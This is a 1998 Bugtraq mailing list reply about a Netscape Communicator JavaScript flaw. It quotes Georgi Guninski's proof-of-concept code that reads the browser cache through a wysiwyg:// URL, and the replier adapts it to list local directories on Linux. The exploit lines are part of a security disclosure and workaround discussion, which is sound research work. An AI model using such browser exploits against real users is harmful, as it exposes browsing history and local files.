Bugtraq mailing list archives
Re: Javascript bug in Netscape Communicator 4.5
From: tool () SNIPER ORG (Ryan Gray)
Date: Thu, 29 Oct 1998 17:09:23 -0600
Hello, Just wanted to add that Netscape Communicator 4.5b2 on Slackware Linux 3.5 (kernel 2.0.34) is susceptible to this also. I was able to get the script to read my cache. As for the local reading, with a little modification, it'll do that to. Example: the line in George's script that reads local files is - sl=window.open('wysiwyg://1/file:///c|/'); With just little change, taking the Linux directory structure into consideration and adding proper backslash escapes - sl=window.open('wysiwyg://1/file://\/'); That'll give you listing of '/' on the local box. (tsk, tsk, tsk) Regards, Ryan Gray http://www.sniper.org - Home of the Afterlife On Wed, 28 Oct 1998, Georgi Guninski wrote:
There is a bug in Netscape Communicator 4.5, 4.07, 3.04 under Windows 95 (probably others) which allows reading user's cache (the urls the user has visited, including the info in GET forms). Reading local directories content is also allowed. This info may be sent to an arbitrary host. The bug may be exploited by email. Demonstration is available at: Cache reading: http://www.geocities.com/ResearchTriangle/1711/b4.html Directory reading: http://www.geocities.com/ResearchTriangle/1711/b5.html The javascript code is: sl=window.open('wysiwyg://1/about:cache'); //For Netscape 3.04 remove 'wysiwyg://1/' sl2=sl.window.open(); sl2.location="javascript:function f() {s='<SCRIPT>cr=\"\t \"; x=\"Here are some links from your cache:\"; for(i=0;i<5;i++) x+=opener.document.links[i]+cr;alert(x);</'+'SCRIPT>';return s};f()"; sl2.location.reload(); Workaround: Disable Javascript. Regards, Georgi Guninski http://www.geocities.com/ResearchTriangle/1711/ ______________________________________________________ Get Your Private, Free Email at http://www.hotmail.com
Current thread:
- Printer Sharing and M1CR0S0FT Windows98 enayd () KRYPT COM (Oct 24)
- Re: Printer Sharing and M1CR0S0FT Windows98 Neale Banks (Oct 27)
- Re: Printer Sharing and M1CR0S0FT Windows98 Caskey L. Dickson (Oct 28)
- More about multi-stack allocator. Serge Orlov (Oct 28)
- FW: Security Bulletins Digest Patrick Oonk (Oct 28)
- Javascript bug in Netscape Communicator 4.5 Georgi Guninski (Oct 28)
- Re: Javascript bug in Netscape Communicator 4.5 Willy TARREAU (Oct 29)
- Re: Javascript bug in Netscape Communicator 4.5 Ryan Gray (Oct 29)
- <Possible follow-ups>
- Re: Printer Sharing and M1CR0S0FT Windows98 Paul Leach (Oct 27)
- Re: Printer Sharing and M1CR0S0FT Windows98 Neale Banks (Oct 27)